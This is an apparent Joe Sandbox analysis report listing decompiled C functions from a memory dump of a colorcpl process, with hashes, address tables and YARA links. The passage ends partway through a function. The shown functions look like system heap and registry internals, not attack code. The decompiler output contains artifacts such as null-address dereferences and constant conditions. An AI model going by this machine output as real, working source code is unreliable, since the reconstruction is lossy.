Instruction ID: c4680aff99699aaee38748bdd27c6dd905a28131b05cfaa622987c7a26938cc6
Opcode Fuzzy Hash: 7a88e87304113b3612f3762961c2bc04bcc7e5b5c6181f0252f0d9c5367c7b2d
Instruction Fuzzy Hash: 4C51D835900219EFEF209FE0CD86BAEB7B8AF10728F11666DD91167290D775BE40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 044086A8 Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E044086A8(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				void* _t69;
				signed int _t73;
				signed char _t86;
				signed int _t89;

				_t74 = __edx;
				_push(__ecx);
				_t86 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0xb0));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t89 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E04409BB8(_t57, _t86, _t74, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E04408565(_t86, _t74, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t73 = _t89;
					} else {
						_t73 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t73;
					_t62 = _a8;
					L11:
					_t74 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t86 + 0x10)) == _t89) {
						L19:
						if(( *(_t86 + 0xc) & 0x10000000) == 0) {
							L22:
							_t75 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t89 - 2;
								if(_t89 != 2) {
									_t33 = _t89 + 2; // 0x2
									__eflags = (_t33 << 7) + _t86;
									_t89 = E0440BA66((_t33 << 7) + _t86, _t75, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0440A553(_t86, _v8, _t57);
								asm("sbb esi, esi");
								_t89 =  ~_t89;
								_t41 = E04353C40();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t89;
										if(_t89 != 0) {
											E043FF247(_t86, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E0440DE9F(_t57, 0x4436dc8, (_t75 -  *0x4436dc4 >> 0x14) + (_t75 -  *0x4436dc4 >> 0x14), _t86, _t89, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t75 = _v12;
							_t27 = _t47 - 1; // -1
							_t89 = _t27;
							goto L25;
						}
						_t62 = _t86;
						if(E04409B4D(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t89);
						_push(_t89);
						_push(_t89);
						_push(_v8);
						_t69 = 9;
						E04405FED(_t69, _t86);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E043E78DE(_t62, _t86, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t89;
							}
							goto L19;
						}
						_t62 = _t86;
						_t36 = E04408565(_t62, _t74, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x044086a8
0x044086b0
0x044086b7
0x044086b9
0x044086c0
0x044086cb
0x044086cf
0x044086dc
0x044086dc
0x044086df
0x044086e1
0x044086e3
0x044086e6
0x0440870f
0x04408712
0x04408714
0x00000000
0x00000000
0x0440871a
0x0440871f
0x04408722
0x04408724
0x00000000
0x044086e8
0x044086ef
0x044086f6
0x04408702
0x044086fd
0x044086fd
0x044086fd
0x04408707
0x0440870a
0x04408726
0x04408726
0x0440872a
0x04408730
0x04408774
0x0440877b
0x044087a4
0x044087a4
0x044087a8
0x044087ab
0x044087ce
0x044087ce
0x044087d1
0x0440882a
0x04408831
0x04408838
0x00000000
0x04408838
0x044087d3
0x044087d4
0x044087dc
0x044087e3
0x044087e5
0x044087e7
0x044087ec
0x044087ee
0x04408800
0x044087f0
0x044087f9
0x044087f9
0x04408805
0x04408808
0x0440880a
0x04408810
0x04408817
0x04408819
0x0440881b
0x04408823
0x04408823
0x0440881b
0x04408817
0x00000000
0x04408808
0x044087b6
0x044087be
0x044087c3
0x044087c5
0x00000000
0x00000000
0x044087c7
0x044087cb
0x044087cb
0x00000000
0x044087cb
0x04408781
0x0440878c
0x00000000
0x00000000
0x0440878e
0x0440878f
0x04408790
0x04408791
0x04408799
0x0440879a
0x00000000
0x04408737
0x04408737
0x04408739
0x04408748
0x0440874b
0x00000000
0x00000000
0x0440874d
0x04408753
0x00000000
0x00000000
0x04408762
0x0440876e
0x0440883a
0x04408842
0x04408842
0x00000000
0x0440876e
0x0440873d
0x0440873f
0x04408746
0x00000000
0x00000000
0x00000000
0x04408746
0x04408730

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 176a5555dd5134101dd16233289e4c9916100bc4e0b1badf94afe5ad2062e5d5
Instruction ID: 79a397cd8e540c52f7034621b5abddb047c941df57a0188ea7a74c00483d9fd1
Opcode Fuzzy Hash: 176a5555dd5134101dd16233289e4c9916100bc4e0b1badf94afe5ad2062e5d5
Instruction Fuzzy Hash: 4B41B4717006119BDF29AA2ACD94B7BB799EF80764F04C23AE815873C5DB34F821C691

Uniqueness

Uniqueness Score: -1.00%

Function 0434510D Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0434510D(void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t38;
				signed int _t49;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;
				signed int _t57;
				signed int _t58;
				intOrPtr _t64;
				signed int* _t73;
				signed int* _t76;
				signed int _t78;
				signed int _t80;
				signed int _t81;
				void* _t82;

				_t71 = __edx;
				_t66 = __ecx;
				_push(0x1c);
				_push(0x441bd00);
				E04397BE4(__ebx, __edi, __esi);
				_t64 = __edx;
				 *((intOrPtr*)(_t82 - 0x28)) = __edx;
				_t73 = __ecx;
				 *((intOrPtr*)(_t82 - 0x2c)) = __ecx;
				_t76 =  *(_t82 + 8);
				if(_t76 == 0 || __ecx == 0 || __edx == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					E04414A6D(_t64, _t66, _t71, _t73, _t76);
					_t38 = 0xc000000d;
				} else {
					if( *__ecx == 0) {
						L10:
						 *(_t82 - 0x20) =  *(_t82 - 0x20) & 0x00000000;
						_t38 = E04341E70(_t82 - 0x20, 0);
						 *(_t82 - 0x24) = _t38;
						__eflags = _t38;
						if(_t38 < 0) {
							L9:
							 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
							return _t38;
						}
						L04352330(_t38, _t64);
						 *(_t82 - 4) = 1;
						__eflags =  *_t73;
						if( *_t73 != 0) {
							asm("lock inc dword [eax]");
							L27:
							 *(_t82 - 4) = 0xfffffffe;
							E043452CD(_t64);
							_t78 =  *(_t82 - 0x20);
							__eflags = _t78;
							if(__eflags != 0) {
								_push(_t78);
								E0433AE40(_t64, _t73, _t78, __eflags);
							}
							__eflags =  *(_t82 - 0x24);
							if( *(_t82 - 0x24) >= 0) {
								 *( *(_t82 + 8)) =  *_t73;
							}
							_t38 =  *(_t82 - 0x24);
							goto L9;
						}
						__eflags = _t73 - 0x4436890;
						if(_t73 != 0x4436890) {
							__eflags = _t73 - 0x4436888;
							if(_t73 != 0x4436888) {
								L26:
								 *_t73 =  *(_t82 - 0x20);
								_t23 = _t82 - 0x20;
								 *_t23 =  *(_t82 - 0x20) & 0x00000000;
								__eflags =  *_t23;
								goto L27;
							}
							E04341D50(_t66,  *(_t82 - 0x20), 1);
							_t49 = E0437D0F0( *(_t82 - 0x20), 1);
							L37:
							__eflags = _t49;
							 *(_t82 - 0x24) = _t49;
							if(_t49 >= 0) {
								goto L26;
							}
							goto L27;
						}
						_t50 =  *0x4436970; // 0x0
						__eflags = _t50;
						if(_t50 != 0) {
							E04341D50(_t66,  *(_t82 - 0x20), _t50);
							L25:
							_t52 =  *0x4436968; // 0x0
							__eflags = _t52;
							if(_t52 != 0) {
								_t49 = E0437D6A0( *(_t82 - 0x20), _t52);
								goto L37;
							}
							goto L26;
						}
						_t53 =  *0x443696c; // 0x0
						__eflags = _t53;
						if(_t53 != 0) {
							L19:
							E04341D50(_t66,  *(_t82 - 0x20), _t53);
							__eflags =  *0x443696c;
							if( *0x443696c > 0) {
								_t55 = 0;
								L24:
								E0437BED0( *(_t82 - 0x20), _t55);
								goto L25;
							}
							_t80 =  *(_t82 - 0x20);
							__eflags = _t80;
							if(_t80 != 0) {
								_t57 =  *(_t80 + 0x110);
								__eflags = _t57;
								if(_t57 != 0) {
									L22:
									_t55 = _t57 << 2;
									__eflags = _t55 - 0x180;
									if(_t55 < 0x180) {
										_t55 = 0x180;
									}
									goto L24;
								}
							}
							_t57 =  *0x7ffe03c0;
							goto L22;
						}
						_t81 =  *(_t82 - 0x20);
						__eflags = _t81;
						if(_t81 != 0) {
							_t58 =  *(_t81 + 0x110);
							__eflags = _t58;
							if(_t58 != 0) {
								L17:
								_t53 = _t58 << 3;
								_t66 = 0x300;
								__eflags = _t53 - 0x300;
								if(_t53 < 0x300) {
									_t53 = 0x300;
								}
								goto L19;
							}
						}
						_t58 =  *0x7ffe03c0;
						goto L17;
					}
					 *((char*)(_t82 - 0x19)) = 0;
					L043453C0(__edx);
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					if( *_t73 != 0) {
						asm("lock inc dword [eax]");
						 *_t76 =  *_t73;
						 *((char*)(_t82 - 0x19)) = 1;
					}
					 *(_t82 - 4) = 0xfffffffe;
					E043452C6(_t64);
					if( *((char*)(_t82 - 0x19)) == 0) {
						goto L10;
					}
					_t38 = 0;
				}
			}

0x0434510d
0x0434510d
0x0434510d
0x0434510f
0x04345114
0x04345119
0x0434511b
0x0434511e
0x04345120
0x04345123
0x04345128
0x043a0599
0x043a059e
0x04345151
0x04345154
0x0434519b
0x0434519b
0x043451a5
0x043451aa
0x043451ad
0x043451af
0x04345189
0x0434518c
0x04345198
0x04345198
0x043451b2
0x043451b7
0x043451c0
0x043451c2
0x043452d4
0x04345257
0x04345257
0x0434525e
0x04345263
0x04345266
0x04345268
0x043a058e
0x043a058f
0x043a058f
0x0434526e
0x04345272
0x04345279
0x04345279
0x0434527b
0x00000000
0x0434527b
0x043451c8
0x043451ce
0x043452a2
0x043452a8
0x0434524e
0x04345251
0x04345253
0x04345253
0x04345253
0x00000000
0x04345253
0x043452b0
0x043452b8
0x043452bd
0x043452bd
0x043452bf
0x043452c2
0x00000000
0x00000000
0x00000000
0x043452c4
0x043451d4
0x043451d9
0x043451db
0x043a0564
0x04345241
0x04345241
0x04345246
0x04345248
0x043a0579
0x00000000
0x043a0579
0x00000000
0x04345248
0x043451e1
0x043451e6
0x043451e8
0x04345208
0x0434520c
0x04345211
0x04345218
0x043a056e
0x04345238
0x0434523c
0x00000000
0x0434523c
0x0434521e
0x04345221
0x04345223
0x04345296
0x0434529c
0x0434529e
0x0434522a
0x0434522a
0x04345232
0x04345234
0x04345236
0x04345236
0x00000000
0x04345234
0x043452a0
0x04345225
0x00000000
0x04345225
0x043451ea
0x043451ed
0x043451ef
0x04345283
0x04345289
0x0434528b
0x043451fa
0x043451fa
0x043451fd
0x04345202
0x04345204
0x04345206
0x04345206
0x00000000
0x04345204
0x04345291
0x043451f5
0x00000000
0x043451f5
0x04345156
0x0434515b
0x04345160
0x04345168
0x0434516a
0x0434516f
0x04345171
0x04345171
0x04345175
0x0434517c
0x04345185
0x00000000
0x00000000
0x04345187
0x04345187

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82fdb655ca3a037ce1f15229884cc2a2622b0d79edae1d8c54dcb39fdbe8cbc0
Instruction ID: b680d52f69fbe48dbf40497164fcfaf265bef6aa59840c29413c22e2855ffe84
Opcode Fuzzy Hash: 82fdb655ca3a037ce1f15229884cc2a2622b0d79edae1d8c54dcb39fdbe8cbc0
Instruction Fuzzy Hash: 63518C71F05615AFEF259FA8C840BED73F4AF89759F10201AEA11F7650E778B9408B50

Uniqueness

Uniqueness Score: -1.00%

Function 043D56E0 Relevance: .1, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E043D56E0(intOrPtr _a4, signed int _a8, signed short* _a12, signed int _a16, signed short* _a20, signed int _a24, intOrPtr _a28, signed int _a32) {
				signed int* _v8;
				signed int _v12;
				signed int _v16;
				void* _t69;
				void* _t70;
				signed int* _t103;
				signed int* _t107;
				signed int _t109;
				signed int _t115;
				signed int* _t117;
				signed int _t125;
				signed int* _t126;
				signed short* _t127;
				intOrPtr _t129;
				signed int _t132;
				signed int _t134;
				signed int* _t135;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				void* _t140;

				_t109 = _a8;
				if(_t109 == 1 || _t109 == 2) {
					_t129 = _a4;
					_t132 = 0xfffffffc;
					_t125 = _a32 + 0x00000003 & _t132;
					_v16 = _t125;
					_t126 =  *(_t129 + 0xc);
					_t115 = (( *_a12 & 0x0000ffff) + 0x00000003 & _t132) + _t125 + (( *_a20 & 0x0000ffff) + 0x00000003 & _t132) + 0x0000002b & _t132;
					_v12 = _t115;
					_t69 = _t126[2] + _t115;
					if(_t69 < _t115) {
						L11:
						_t70 = 0xc0000017;
						L12:
						return _t70;
					}
					_t134 = _t126[1];
					if(_t69 <= _t134) {
						L8:
						_t117 = _t126 + _t126[2];
						_t127 = _a12;
						_t135 = _a20;
						_v8 = _t117;
						 *_t117 = _v12;
						_t117[1] = _t109;
						_t117[2] =  *_t127;
						_t117[3] = _t127[2];
						_t117[4] =  *_t135;
						_t117[5] = _t135[1];
						_t117[7] = _a24;
						_t117[8] = _a32;
						_t117[6] = _a16;
						_t137 = ( *(_t129 + 0xc))[2] + 0x28;
						E04388C00( *(_t129 + 0xc) + _t137, _t127[2],  *_t127 & 0x0000ffff);
						_v8[3] = _t137;
						_t138 = _t137 + (( *_a12 & 0x0000ffff) + 0x00000003 & 0xfffffffc);
						E04388C00( *(_t129 + 0xc) + _t138, _a20[2],  *_a20 & 0x0000ffff);
						_v8[5] = _t138;
						_t139 = _t138 + (( *_a20 & 0x0000ffff) + 0x00000003 & 0xfffffffc);
						if(_t109 == 2) {
							E04388C00( *(_t129 + 0xc) + _t139, _a28, _a32);
							_v8[9] = _t139;
							_t139 = _t139 + _v16;
						}
						( *(_t129 + 0xc))[2] = _t139 + 0x00000003 & 0xfffffffc;
						 *( *(_t129 + 0xc)) =  *( *(_t129 + 0xc)) + 1;
						_t70 = 0;
						goto L12;
					} else {
						goto L5;
					}
					do {
						L5:
						_t134 = _t134 + _t134;
					} while (_t134 < _t69);
					_t103 = E04355D90(_t115,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t134);
					_v8 = _t103;
					if(_t103 == 0) {
						goto L11;
					}
					E043888C0(_t103,  *(_t129 + 0xc), ( *(_t129 + 0xc))[2]);
					_t140 = _t140 + 0xc;
					E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *(_t129 + 0xc));
					_t107 = _v8;
					 *(_t129 + 0xc) = _t107;
					_t107[1] = _t134;
					_t126 =  *(_t129 + 0xc);
					goto L8;
				} else {
					return 0xc000000d;
				}
			}

0x043d56e9
0x043d56ef
0x043d5714
0x043d5719
0x043d571d
0x043d5722
0x043d572e
0x043d5733
0x043d5735
0x043d573b
0x043d573f
0x043d586b
0x043d586b
0x043d5870
0x00000000
0x043d5871
0x043d5745
0x043d574a
0x043d579d
0x043d57a3
0x043d57a5
0x043d57a8
0x043d57ab
0x043d57ae
0x043d57b0
0x043d57b5
0x043d57bb
0x043d57c0
0x043d57c6
0x043d57cc
0x043d57d2
0x043d57d8
0x043d57e8
0x043d57ef
0x043d57fa
0x043d5809
0x043d5818
0x043d5823
0x043d5832
0x043d5837
0x043d5845
0x043d5850
0x043d5853
0x043d5853
0x043d585f
0x043d5865
0x043d5867
0x00000000
0x00000000
0x00000000
0x00000000
0x043d574c
0x043d574c
0x043d574c
0x043d574e
0x043d575e
0x043d5763
0x043d5768
0x00000000
0x00000000
0x043d5776
0x043d5781
0x043d578c
0x043d5791
0x043d5794
0x043d5797
0x043d579a
0x00000000
0x043d56f6
0x00000000
0x043d56f6

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54d17f16e73df959ade6801bfd14df47c5558d1bd833c14dc3138929320731b6
Instruction ID: 7cdd5cc92caa1739a5b5ce6835e3bef96f504894d7ec05267e2fb3dcd0beae55
Opcode Fuzzy Hash: 54d17f16e73df959ade6801bfd14df47c5558d1bd833c14dc3138929320731b6
Instruction Fuzzy Hash: 5F512972A00619EFCB14DF58D880A5AFBF5FF08318B298699E819DB351D335ED61CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0437F63F Relevance: .1, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0437F63F(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v12;
				char _v16;
				signed short _v20;
				intOrPtr _v24;
				signed char _v28;
				short _v30;
				char _v32;
				signed short _t40;
				intOrPtr _t53;
				signed int _t56;
				void* _t60;
				signed int _t63;
				signed char _t64;
				void* _t73;
				void* _t76;
				intOrPtr _t78;

				_v24 = __ecx;
				_t63 = 0;
				_v32 = 0;
				_v28 = 0;
				_v12 = 0;
				_v16 = 0;
				_t73 = __edx;
				if(__ecx == 0 || __edx == 0) {
					_t76 = 0xc000000d;
					goto L6;
				} else {
					_t40 =  *((intOrPtr*)(__ecx)) + 0x00000038 & 0x0000ffff;
					_v20 = _t40;
					_v8 = _t40 & 0x0000ffff;
					_t78 = E04355D60(_t40 & 0x0000ffff);
					if(_t78 == 0) {
						_t76 = 0xc0000017;
						L7:
						if(_t73 != 0) {
							E04353B90(_t73);
						}
						L9:
						if(_t63 != 0) {
							E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t63);
						}
						L10:
						E04353B90( &_v32);
						return _t76;
					}
					E04388F40(_t78, 0, _v8);
					_v30 = _v20;
					_v28 = _t78;
					_t76 = E043610D0(0,  &_v32, 0x43111e0);
					if(_t76 < 0) {
						goto L7;
					}
					_t76 = E043610D0(0,  &_v32, _v24);
					if(_t76 < 0) {
						goto L7;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push( &_v16);
					_push( &_v32);
					_t76 = E04383EE0();
					if(_t76 == 0xc0000023) {
						_t53 =  *0x4435d78; // 0x0
						_t64 = _v12;
						_t56 = E04355D90(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t53 + 0x140000, _t64);
						_v8 = _t56;
						_push( &_v12);
						_push(_t64);
						_push(_t56);
						_push( &_v16);
						_push( &_v32);
						_t76 = E04383EE0();
						if(_t76 < 0) {
							L18:
							_t63 = _v8;
							goto L7;
						}
						if(_v16 != 1 || _t64 < 1 || (_t64 & 0x00000001) != 0) {
							_t76 = 0xc0000001;
						} else {
							_t60 = E04355D60(_t64);
							_t79 = _t60;
							if(_t60 != 0) {
								_t63 = _v8;
								E043888C0(_t79, _t63, _t64);
								_t76 = E043BCA41(_t73, _t79);
								if(_t76 < 0) {
									goto L7;
								}
								_t76 = 0;
								goto L9;
							}
							_t76 = 0xc0000017;
						}
						goto L18;
					}
					L6:
					if(_t76 >= 0) {
						goto L10;
					}
					goto L7;
				}
			}

0x0437f64c
0x0437f64f
0x0437f651
0x0437f654
0x0437f657
0x0437f65a
0x0437f65f
0x0437f663
0x043ad917
0x00000000
0x0437f671
0x0437f678
0x0437f67b
0x0437f682
0x0437f68a
0x0437f68e
0x043ad87e
0x0437f6f6
0x0437f6f8
0x0437f6fb
0x0437f6fb
0x0437f700
0x0437f702
0x043ad92d
0x043ad92d
0x0437f708
0x0437f70c
0x0437f717
0x0437f717
0x0437f699
0x0437f6a4
0x0437f6ab
0x0437f6b9
0x0437f6bd
0x00000000
0x00000000
0x0437f6cb
0x0437f6cf
0x00000000
0x00000000
0x0437f6d4
0x0437f6d5
0x0437f6d6
0x0437f6da
0x0437f6de
0x0437f6e4
0x0437f6ec
0x043ad888
0x043ad88d
0x043ad8a0
0x043ad8a8
0x043ad8ab
0x043ad8ac
0x043ad8ad
0x043ad8b1
0x043ad8b5
0x043ad8bb
0x043ad8bf
0x043ad8e2
0x043ad8e2
0x00000000
0x043ad8e2
0x043ad8c5
0x043ad910
0x043ad8d1
0x043ad8d2
0x043ad8d7
0x043ad8db
0x043ad8eb
0x043ad8f0
0x043ad8ff
0x043ad903
0x00000000
0x00000000
0x043ad909
0x00000000
0x043ad909
0x043ad8dd
0x043ad8dd
0x00000000
0x043ad8c5
0x0437f6f2
0x0437f6f4
0x00000000
0x00000000
0x00000000
0x0437f6f4

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5325fc2ab3f8fee722e5eee11efe10d74fff5d9ec5b70ab203419ce96db57301
Instruction ID: ee8dd94aa67fcfd40e56e38d90e0153bb9f87ce04da854724d0bcb23b6a3056d
Opcode Fuzzy Hash: 5325fc2ab3f8fee722e5eee11efe10d74fff5d9ec5b70ab203419ce96db57301
Instruction Fuzzy Hash: 7D41C872D00629EBDB21EB988884EAFB7BDEF04754F151066ED04E7210E635FE0097E4

Uniqueness

Uniqueness Score: -1.00%

Function 0440A553 Relevance: .1, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0440A553(intOrPtr* __ecx, char __edx, signed int _a4) {
				char _v12;
				char _v16;
				intOrPtr _v19;
				char _v20;
				intOrPtr _v23;
				void* _v32;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t36;
				signed int _t41;
				void* _t42;
				char* _t54;
				signed int _t63;
				signed int _t71;
				void* _t72;
				signed int _t75;
				unsigned int _t76;
				char _t88;
				intOrPtr* _t101;
				signed int _t104;
				void* _t114;

				_t88 = __edx;
				_t1 =  &_a4;
				 *_t1 = _a4 & 0x00000001;
				_v12 = __edx;
				_t101 = __ecx;
				if( *_t1 == 0) {
					L04352330(__ecx + 0x40, __ecx + 0x40);
					_t88 = _v16;
				}
				_t36 = _t101 + 0x44;
				_t63 = 0;
				_t104 =  *_t36;
				if(( *(_t36 + 4) & 0x00000001) != 0) {
					if(_t104 == 0) {
						_t104 = 0;
					} else {
						_t104 = _t104 ^ _t36;
					}
				}
				_t71 =  *(_t36 + 4) & 1;
				if(_t104 == 0) {
					L18:
					if(_a4 == _t63) {
						E043524D0(_t101 + 0x40);
						_t88 = _v16;
					}
					_push(_t63);
					_push(_t63);
					_push(_t63);
					_push(_t88);
					_t72 = 8;
					E04405FED(_t72, _t101);
					goto L28;
				} else {
					_t41 = _t71;
					do {
						_t114 = _t88 - ( *(_t104 + 0xc) & 0xffff0000);
						if(_t114 < 0) {
							_t75 =  *_t104;
							goto L12;
						}
						if(_t114 <= 0) {
							break;
						}
						_t75 =  *(_t104 + 4);
						L12:
						if(_t41 == 0 || _t75 == 0) {
							_t104 = _t75;
						} else {
							_t104 = _t104 ^ _t75;
						}
					} while (_t104 != 0);
					_t42 = _t101 + 0x44;
					if(_t104 != 0) {
						_push(_t104);
						L04369B40(_t63, _t101, _t104, _t42);
						if(_a4 == _t63) {
							E043524D0(_t101 + 0x40);
						}
						_t76 =  *(_t104 + 0x10);
						_push( *((intOrPtr*)(_t101 + 4)));
						_push( *_t101);
						_t67 = 1 << (_t76 >> 0x00000002 & 0x0000003f);
						_push(0x8000);
						_t22 = _t67 - 1; // 0x0
						_v20 = ((_t76 >> 0x00000001 & 1) + (_t76 >> 0xc) << 0xc) - 1 + (1 << (_t76 >> 0x00000002 & 0x0000003f)) - (((_t76 >> 0x00000001 & 1) + (_t76 >> 0x0000000c) << 0x0000000c) - 0x00000001 + 1 & _t22);
						E04408845( &_v16,  &_v20);
						asm("lock xadd [eax], ecx");
						asm("lock xadd [eax], edx");
						E04409629(_t104,  *_t101,  *((intOrPtr*)(_t101 + 4)));
						_t106 = _v40;
						_t63 = _v40;
						if(E04353C40() == 0) {
							_t54 = 0x7ffe0388;
						} else {
							_t106 = _v23;
							_t54 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
						}
						if( *_t54 != 0) {
							E043FDA30(_t63, _t101, _v19, _t106);
						}
						L28:
						return _t63;
					}
					goto L18;
				}
			}

0x0440a553
0x0440a55e
0x0440a55e
0x0440a565
0x0440a569
0x0440a56b
0x0440a571
0x0440a576
0x0440a576
0x0440a57a
0x0440a57d
0x0440a583
0x0440a585
0x0440a589
0x0440a58f
0x0440a58b
0x0440a58b
0x0440a58b
0x0440a589
0x0440a595
0x0440a59a
0x0440a5cd
0x0440a5d0
0x0440a5d6
0x0440a5db
0x0440a5db
0x0440a5df
0x0440a5e0
0x0440a5e1
0x0440a5e2
0x0440a5e7
0x0440a5e8
0x00000000
0x0440a59c
0x0440a59c
0x0440a59e
0x0440a5a7
0x0440a5a9
0x0440a5b2
0x00000000
0x0440a5b2
0x0440a5ab
0x00000000
0x00000000
0x0440a5ad
0x0440a5b4
0x0440a5b6
0x0440a5c0
0x0440a5bc
0x0440a5bc
0x0440a5bc
0x0440a5c2
0x0440a5c6
0x0440a5cb
0x0440a5f2
0x0440a5f4
0x0440a5fc
0x0440a602
0x0440a602
0x0440a607
0x0440a60c
0x0440a613
0x0440a628
0x0440a62a
0x0440a634
0x0440a648
0x0440a64c
0x0440a65c
0x0440a66c
0x0440a677
0x0440a67c
0x0440a680
0x0440a689
0x0440a69f
0x0440a68b
0x0440a691
0x0440a698
0x0440a698
0x0440a6a7
0x0440a6b0
0x0440a6b0
0x0440a6b5
0x0440a6bd
0x0440a6bd
0x00000000
0x0440a5cb

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
Instruction ID: 71002ad5cba4ca8550a92b0a7669586098ffc490ee5b2b49444643dd1a0e1b46
Opcode Fuzzy Hash: ea43246fbd83d83eaef87b522a15b96089fa26436030b0f1b742671951348d63
Instruction Fuzzy Hash: A141C5726107159FDF25CE24C884A6BB7A9FF94314B05C57EE9529B384EB30F924CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04413157 Relevance: .1, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E04413157(void* __ebx, intOrPtr __ecx, signed short* __edx, void* __edi, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				char _v16;
				char _v32;
				char _v40;
				intOrPtr _t63;
				void* _t64;
				intOrPtr* _t74;
				intOrPtr* _t77;
